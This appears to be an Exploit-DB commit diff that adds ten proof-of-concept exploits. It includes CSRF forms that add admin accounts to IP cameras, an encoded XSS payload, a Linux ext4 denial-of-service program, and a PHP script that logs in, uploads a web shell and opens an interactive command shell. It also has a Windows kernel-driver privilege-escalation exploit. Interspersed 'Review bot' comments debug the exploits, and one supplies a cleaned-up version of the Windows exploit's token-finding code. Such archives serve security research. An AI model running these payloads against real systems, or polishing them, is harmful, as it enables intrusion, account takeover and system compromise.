DB: 2015-11-01

10 new exploits
Offensive Security 2015-11-01 05:01:56 +00:00
parent 6dfa3e2539
commit 6123605b39
11 changed files with 517 additions and 0 deletions


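--- a/<csv path not shown on page>
+++ b/<csv path not shown on page>
@@ -34855,3 +34855,12 @@ id,file,description,date,author,platform,type,port
 38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
 38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
 38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0
+38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0
+38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery Vulnerability",2013-06-12,Castillo,hardware,remote,0
+38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery 'upload.php' Arbitrary File Upload Vulnerability",2013-06-12,"Marcos Garcia",php,webapps,0
+38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection Vulnerability",2013-06-15,"Ismail Kaleem",android,remote,0
+38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass Vulnerability",2013-06-14,felipensp,multiple,remote,0
+38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload Vulnerability",2013-06-17,"CWH Underground",php,webapps,0
+38589,platforms/linux/dos/38589.c,"Linux Kernel <= 3.0.5 'test_root()' Function Local Denial of Service Vulnerability",2013-06-05,"Jonathan Salwan",linux,dos,0
+38590,platforms/php/webapps/38590.txt,"et-chat Privilege Escalation and Arbitrary Shell Upload Vulnerabilities",2013-06-18,MR.XpR,php,webapps,0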



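--- a/platforms/android/remote/38586.txt
+++ b/platforms/android/remote/38586.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60566/info
+TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
+<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>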


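--- a/platforms/hardware/remote/38582.html
+++ b/platforms/hardware/remote/38582.html
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/60526/info
+Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
+Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected.
+<html>
+<body>
+<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
+<input type="hidden" name="action" value="add">
+<input type="hidden" name="index" value="0">
+<input type="hidden" name="username" value="test2">
+<input type="hidden" name="password" value="test2">
+<input type="hidden" name="privilege" value="1">
+<script>document.gobap.submit();</script>
+</form>
+</body>
+</html>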
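Review bot: The PoC carries no comment stating its precondition — the victim's browser must already hold an authenticated session to the camera, since the auto-submitted form only works because the session cookie is attached to the cross-origin POST to `cgi-bin/users.cgi` — nor what the fix looks like (a per-request anti-CSRF token validated server-side, and `SameSite` on the session cookie). A two-line header comment after the `source:` line, e.g. `<!-- Precondition: victim logged in to the camera in the same browser. Remediation: anti-CSRF token on users.cgi; SameSite session cookie. -->`, would make the file usable as a detection and remediation reference rather than only a trigger. The same documentation gap applies to the Sony section (`command/user.cgi`) and the Grandstream section (`goform/usermanage`) further down this commit.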


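--- a/platforms/hardware/remote/38583.html
+++ b/platforms/hardware/remote/38583.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/60529/info
+Sony CH and DH series IP cameras including SNCCH140, SNCCH180, SNCCH240, SNCCH280, SNCDH140, SNCDH140T, SNCDH180, SNCDH240, SNCDH240T, and SNCDH280 are prone to multiple cross-site request-forgery vulnerabilities.
+Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+<html>
+<body>
+<form name="SonyCsRf" action="http://xx.xx.xx.xx/command/user.cgi" method="POST">
+<input type="Select" name="ViewerModeDefault" value="00000fff">
+<input type="Hidden" name="ViewerAuthen" value="off">
+<input type="Hidden" name="Administrator" value="YWRtaW46YWRtaW4=">
+<input type="Hidden" name="User1" value="xxxx,c0000fff">
+<input type="Hidden" name="User2" value="xxxx,c0000fff">
+<input type="Hidden" name="User3" value="dG1wdG1wOnRtcHRtcA==,c0000fff">
+<input type="Hidden" name="User4" value="Og==,00000fff">
+<input type="Hidden" name="User5" value="Og==,00000fff">
+<input type="Hidden" name="User6" value="Og==,00000fff">
+<input type="Hidden" name="User7" value="Og==,00000fff">
+<input type="Hidden" name="User8" value="Og==,00000fff">
+<input type="Hidden" name="User9" value="Og==,00000fff">
+<input type="Hidden" name="Reload" value="referer">
+<script>document.SonyCsRf.submit();</script>
+</form>
+</body>
+</html>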


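--- a/platforms/hardware/remote/38584.txt
+++ b/platforms/hardware/remote/38584.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60532/info
+Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
+http://www.example.com/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0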

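--- a/platforms/linux/dos/38589.c
+++ b/platforms/linux/dos/38589.c
@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/60586/info
+The Linux Kernel is prone to a local denial-of-service vulnerability.
+Local attackers can exploit this issue to trigger an infinite loop which may cause denial-of-service conditions.
+/*
+** PoC - kernel <= 3.10 CPU Thread consumption in ext4 support. (Infinite loop)
+** Jonathan Salwan - 2013-06-05
+*/
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/fs.h>
+#include <stdio.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+struct ext4_new_group_input {
+__u32 group;
+__u64 block_bitmap;
+__u64 inode_bitmap;
+__u64 inode_table;
+__u32 blocks_count;
+__u16 reserved_blocks;
+__u16 unused;
+};
+#define EXT4_IOC_GROUP_ADD _IOW('f', 8, struct ext4_new_group_input)
+int main(int ac, const char *av[]){
+struct ext4_new_group_input input;
+int fd;
+if (ac < 2){
+printf("Syntax : %s <ext4 device>\n", av[0]);
+printf("Example : %s /tmp\n", av[0]);
+return -1;
+}
+printf("[+] Opening the ext4 device\n");
+if ((fd = open(av[1], O_RDONLY)) < 0){
+perror("[-] open");
+return -1;
+}
+printf("[+] Trigger the infinite loop\n");
+input.group = -1;
+if (ioctl(fd, EXT4_IOC_GROUP_ADD, &input) < 0){
+perror("[-] ioctl");
+}
+close(fd);
+return 0;
+}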
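Review bot: `close(fd)` is called without a prototype — `<unistd.h>` is not among the includes, so this is an implicit function declaration, which C99 and later reject. Only `input.group` is assigned before the `ioctl`, so the other five fields of `struct ext4_new_group_input` are handed to the kernel with indeterminate values, which makes the trigger non-reproducible from one run to the next; initialise it as `struct ext4_new_group_input input = {0};`. The header comment says kernel <= 3.10 while this commit's index entry lists <= 3.0.5 — one of the two should be corrected so readers know which kernels actually need the fix. `return -1` from `main` yields exit status 255; `return 1` (or `EXIT_FAILURE`) is the conventional failure code.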


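--- a/platforms/multiple/remote/38587.txt
+++ b/platforms/multiple/remote/38587.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/60569/info
+The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability.
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions, which may aid in launching further attacks
+http://www.example.com/%2ftest/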

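--- a/platforms/php/webapps/38585.pl
+++ b/platforms/php/webapps/38585.pl
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/60533/info
+The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
+NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
+#! /usr/bin/perl
+use LWP;
+use HTTP::Request::Common;
+my ($url, $file) = @ARGV;
+my $ua = LWP::UserAgent->new();
+my $req = POST $url,
+Content_Type => 'form-data',
+Content => [.
+name => $name,
+galleryselect => 1, # Gallery ID, should exist
+Filedata => [ "$file", "file.gif", Content_Type =>
+'image/gif' ]
+];
+my $res = $ua->request( $req );
+if( $res->is_success ) {
+print $res->content;
+} else {
+print $res->status_line, "\n";
+}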
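Review bot: `$name` in the `Content` list is read but never declared or assigned anywhere in the script, so the `name` field is always sent empty, and the `[.` that opens that list is not valid Perl. The script has neither `use strict;` nor `use warnings;`; with both at the top, the undeclared variable and the malformed list would be reported at compile time instead of surfacing as odd runtime behaviour. There is also no check that both `$url` and `$file` were supplied, so a missing second argument reaches `POST` as `undef`; a guard such as `die "usage: $0 <url> <file>\n" unless defined $file;` after the `@ARGV` unpack would make the failure explicit.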

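--- a/platforms/php/webapps/38588.php
+++ b/platforms/php/webapps/38588.php
@@ -0,0 +1,137 @@
+source: http://www.securityfocus.com/bid/60585/info
+bloofoxCMS is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+bloofoxCMS 0.5.0 is vulnerable;other versions may also be affected.
+<?php
+/*
+,--^----------,--------,-----,-------^--,
+| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
+`+---------------------------^----------|
+`\_,-------, _________________________|
+/ XXXXXX /`| /
+/ XXXXXX / `\ /
+/ XXXXXX /\______(
+/ XXXXXX /
+/ XXXXXX /
+(________(
+`------'
+Exploit Title : Bloofox CMS Unrestricted File Upload Exploit
+Date : 17 June 2013
+Exploit Author : CWH Underground
+Site : www.2600.in.th
+Vendor Homepage : http://www.bloofox.com/
+Software Link : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
+Version : 0.5.0
+Tested on : Window and Linux
+#####################################################
+VULNERABILITY: Unrestricted File Upload
+#####################################################
+This application has an upload feature that allows an authenticated user
+with Administrator roles or Editor roles to upload arbitrary files to media
+directory cause remote code execution by simply request it.
+#####################################################
+EXPLOIT
+#####################################################
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+if (!($sock = fsockopen($host, 80)))
+die("\n[-] No response from {$host}:80\n");
+fputs($sock, $packet);
+return stream_get_contents($sock);
+}
+if ($argc < 3)
+{
+print "\n==============================================\n";
+print " Bloofox CMS Unrestricted File Upload Exploit \n";
+print " \n";
+print " Discovered By CWH Underground \n";
+print "==============================================\n\n";
+print " ,--^----------,--------,-----,-------^--, \n";
+print " | ||||||||| `--------' | O \n";
+print " `+---------------------------^----------| \n";
+print " `\_,-------, _________________________| \n";
+print " / XXXXXX /`| / \n";
+print " / XXXXXX / `\ / \n";
+print " / XXXXXX /\______( \n";
+print " / XXXXXX / \n";
+print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+print " (________( \n";
+print " `------' \n\n";
+print "\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
+print "\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
+die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$payload = "username={$argv[3]}&password={$argv[4]}&action=login";
+$packet = "POST {$path}admin/index.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+$response = http_send($host, $packet);
+if (!preg_match("/Location: index.php/i", $response)) die("\n[-] Login failed!\n");
+if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
+print "\n..:: Login Successful ::..\n";
+print "\n..:: Waiting hell ::..\n\n";
+$payload = "--o0oOo0o\r\n";
+$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
+$payload .= "Content-Type: application/octet-stream\r\n\r\n";
+$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
+$payload .= "--o0oOo0o--\r\n";
+$packet = "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
+$packet .= "Cookie: {$sid[1]}\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+http_send($host, $packet);
+$packet = "GET {$path}media/files/sh.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Connection: close\r\n\r\n";
+while(1)
+{
+print "\nBloofox-shell# ";
+if (($cmd = trim(fgets(STDIN))) == "exit") break;
+$response = http_send($host, sprintf($packet, base64_encode($cmd)));
+preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
+?>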
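Review bot: `http_send` never closes the stream it opens — `stream_get_contents` reads to EOF but the handle from `fsockopen` is left for the garbage collector, and since the function is called once per iteration of the `while(1)` loop that is one dangling descriptor per command; `$body = stream_get_contents($sock); fclose($sock); return $body;` fixes it. Because `error_reporting(0)` is set at the top, a failed `fsockopen` discards its reason; passing `$errno, $errstr` as the third and fourth arguments and including them in the `die` text keeps the failure diagnosable. The `argc < 3` guard does not match the four arguments the usage text requires, so a call with only host and path proceeds with `$argv[3]`/`$argv[4]` unset. The header comment correctly records that an authenticated Editor or Administrator account is required; that precondition belongs in the usage text too, since it is what determines the real exposure for anyone triaging this advisory.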


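--- a/platforms/php/webapps/38590.txt
+++ b/platforms/php/webapps/38590.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/60660/info
+et-chat is prone to a privilege-escalation vulnerability and an arbitrary shell-upload vulnerability.
+An attacker can exploit these issues to gain elevated privileges within the application and upload arbitrary shells; this can result in an arbitrary code execution within the context of the vulnerable application.
+et-chat 3.07 is vulnerable; other versions may also be affected.
+http://www.example.com/chat/?AdminRegUserEdit&admin&id=4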

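--- a/platforms/windows/local/38542.cpp
+++ b/platforms/windows/local/38542.cpp
@@ -0,0 +1,205 @@
+# Source: https://github.com/Rootkitsmm/Win10Pcap-Exploit
+/*
+Win10Pcap kernel-mode driver did not check the virtual addresses which are passed from the user-mode , IOCTL Using Neither Buffered Nor Direct I/O without ProbeForWrite to validating passed address
+you need find accurate Device name in runtime to send IOCTL , hardcoded device name dont lead to vulnerable code
+IOCTL handller write a string in passed address , string is something like "Global\WTCAP_EVENT_3889023063_1"
+ther was many way to exploit this vulnerability i decide to set privilege in process TOKEN with overwriting _SEP_TOKEN_PRIVILEGES
+overwriting token at address 0x034 with string "Global\WTCAP_EVENT" can set SeDebugPrivilege without corrupting sensitive Filds
+*/
+#include <stdio.h>
+#include <tchar.h>
+#include<Windows.h>
+#include<stdio.h>
+#include <winternl.h>
+#include <intrin.h>
+#include <psapi.h>
+#include <strsafe.h>
+#include <assert.h>
+#define SL_IOCTL_GET_EVENT_NAME CTL_CODE(0x8000, 1, METHOD_NEITHER, FILE_ANY_ACCESS)
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+/* found with :
+!token
+1: kd> dt nt!_OBJECT_HEADER
++0x000 PointerCount : Int4B
++0x004 HandleCount : Int4B
++0x004 NextToFree : Ptr32 Void
++0x008 Lock : _EX_PUSH_LOCK
++0x00c TypeIndex : UChar
++0x00d TraceFlags : UChar
++0x00e InfoMask : UChar
++0x00f Flags : UChar
++0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
++0x010 QuotaBlockCharged : Ptr32 Void
++0x014 SecurityDescriptor : Ptr32 Void
++0x018 Body : _QUAD
+TypeIndex is 0x5
+*/
+#define HANDLE_TYPE_TOKEN 0x5
+// Undocumented SYSTEM_INFORMATION_CLASS: SystemHandleInformation
+const SYSTEM_INFORMATION_CLASS SystemHandleInformation =
+(SYSTEM_INFORMATION_CLASS)16;
+// The NtQuerySystemInformation function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYSYSTEMINFORMATION)(
+IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+OUT PVOID SystemInformation,
+IN ULONG SystemInformationLength,
+OUT PULONG ReturnLength OPTIONAL
+);
+// Undocumented structure: SYSTEM_HANDLE_INFORMATION
+typedef struct _SYSTEM_HANDLE
+{
+ULONG ProcessId;
+UCHAR ObjectTypeNumber;
+UCHAR Flags;
+USHORT Handle;
+PVOID Object;
+ACCESS_MASK GrantedAccess;
+} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
+typedef struct _SYSTEM_HANDLE_INFORMATION
+{
+ULONG NumberOfHandles;
+SYSTEM_HANDLE Handles[1];
+} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
+// Undocumented FILE_INFORMATION_CLASS: FileNameInformation
+const FILE_INFORMATION_CLASS FileNameInformation =
+(FILE_INFORMATION_CLASS)9;
+// The NtQueryInformationFile function and the structures that it returns
+// are internal to the operating system and subject to change from one
+// release of Windows to another. To maintain the compatibility of your
+// application, it is better not to use the function.
+typedef NTSTATUS (WINAPI * PFN_NTQUERYINFORMATIONFILE)(
+IN HANDLE FileHandle,
+OUT PIO_STATUS_BLOCK IoStatusBlock,
+OUT PVOID FileInformation,
+IN ULONG Length,
+IN FILE_INFORMATION_CLASS FileInformationClass
+);
+// FILE_NAME_INFORMATION contains name of queried file object.
+typedef struct _FILE_NAME_INFORMATION {
+ULONG FileNameLength;
+WCHAR FileName[1];
+} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
+void* FindTokenAddressHandles(ULONG pid)
+{
+/////////////////////////////////////////////////////////////////////////
+// Prepare for NtQuerySystemInformation and NtQueryInformationFile.
+//
+// The functions have no associated import library. You must use the
+// LoadLibrary and GetProcAddress functions to dynamically link to
+// ntdll.dll.
+HINSTANCE hNtDll = LoadLibrary(_T("ntdll.dll"));
+assert(hNtDll != NULL);
+PFN_NTQUERYSYSTEMINFORMATION NtQuerySystemInformation =
+(PFN_NTQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll,
+"NtQuerySystemInformation");
+assert(NtQuerySystemInformation != NULL);
+/////////////////////////////////////////////////////////////////////////
+// Get system handle information.
+//
+DWORD nSize = 4096, nReturn;
+PSYSTEM_HANDLE_INFORMATION pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION)
+HeapAlloc(GetProcessHeap(), 0, nSize);
+// NtQuerySystemInformation does not return the correct required buffer
+// size if the buffer passed is too small. Instead you must call the
+// function while increasing the buffer size until the function no longer
+// returns STATUS_INFO_LENGTH_MISMATCH.
+while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo,
+nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH)
+{
+HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+nSize += 4096;
+pSysHandleInfo = (SYSTEM_HANDLE_INFORMATION*)HeapAlloc(
+GetProcessHeap(), 0, nSize);
+}
+for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
+{
+PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
+if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
+{
+printf(" ObjectTypeNumber %d , ProcessId %d , Object %p \r\n",pHandle->ObjectTypeNumber,pHandle->ProcessId,pHandle->Object);
+return pHandle->Object;
+}
+}
+/////////////////////////////////////////////////////////////////////////
+// Clean up.
+//
+HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
+return 0;
+}
+void main()
+{
+DWORD dwBytesReturned;
+DWORD ShellcodeFakeMemory;
+HANDLE token;
+// first create toke handle so find object address with handle
+if(!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&token))
+DebugBreak();
+void* TokenAddress = FindTokenAddressHandles(GetCurrentProcessId());
+CloseHandle(token);
+// i dont want write fully weaponized exploit so criminal must write code to find "WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3" in runtime ( simple task :)
+HANDLE hDriver = CreateFileA("\\\\.\\WTCAP_A_{B8296C9f-8ed4-48A2-84A0-A19DB94418E3}",GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
+if(hDriver!=INVALID_HANDLE_VALUE)
+{
+fprintf(stderr," Open Driver OK\n");
+if (!DeviceIoControl(hDriver, SL_IOCTL_GET_EVENT_NAME, NULL,0x80,(void*)((char*)TokenAddress+0x34),NULL,&dwBytesReturned, NULL))
+{
+fprintf(stderr,"send IOCTL error %d.\n",GetLastError());
+return;
+}
+else fprintf(stderr," Send IOCTL OK\n");
+}
+else
+{
+fprintf(stderr," Open Driver error %d.\n",GetLastError());
+return;
+}
+CloseHandle(hDriver);
+getchar();
+}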
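Review bot: `FindTokenAddressHandles` returns `pHandle->Object` from inside the loop without freeing `pSysHandleInfo`, so the handle-table buffer is leaked on the found path (the `HeapFree` after the loop only runs when nothing matched), and `hNtDll` from `LoadLibrary` is never released with `FreeLibrary` on either path; the rewrite below copies the result to a local, breaks, and falls through to a single cleanup. The function returns 0 when no token handle for `pid` is found, but `main` never checks `TokenAddress` before computing `(char*)TokenAddress+0x34` for the `DeviceIoControl` call — a guard such as `if (TokenAddress == NULL) { fprintf(stderr, " token object not found\n"); return; }` belongs right after the call. Both `HeapAlloc` results are used unchecked, the `printf` passes `UCHAR`/`ULONG` to `%d`, `ShellcodeFakeMemory` is declared and never used, and `void main()` should be `int main(void)`. The `0x34` offset into the token object is specific to the build the author examined (the header comment gives no build number); recording the tested Windows build and pool layout in that comment would let a defender judge which systems the finding actually applies to.
```cpp
void* FindTokenAddressHandles(ULONG pid)
{
    // … unchanged: ntdll lookup and the STATUS_INFO_LENGTH_MISMATCH growth loop …
    void* found = NULL;
    for (ULONG i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
    {
        PSYSTEM_HANDLE pHandle = &(pSysHandleInfo->Handles[i]);
        if (pHandle->ProcessId == pid && pHandle->ObjectTypeNumber == HANDLE_TYPE_TOKEN)
        {
            printf(" ObjectTypeNumber %u , ProcessId %lu , Object %p \r\n",
                   (unsigned)pHandle->ObjectTypeNumber, (unsigned long)pHandle->ProcessId, pHandle->Object);
            found = pHandle->Object;
            break;
        }
    }
    // Clean up on every path, including the found one.
    HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
    FreeLibrary(hNtDll);
    return found;
}
```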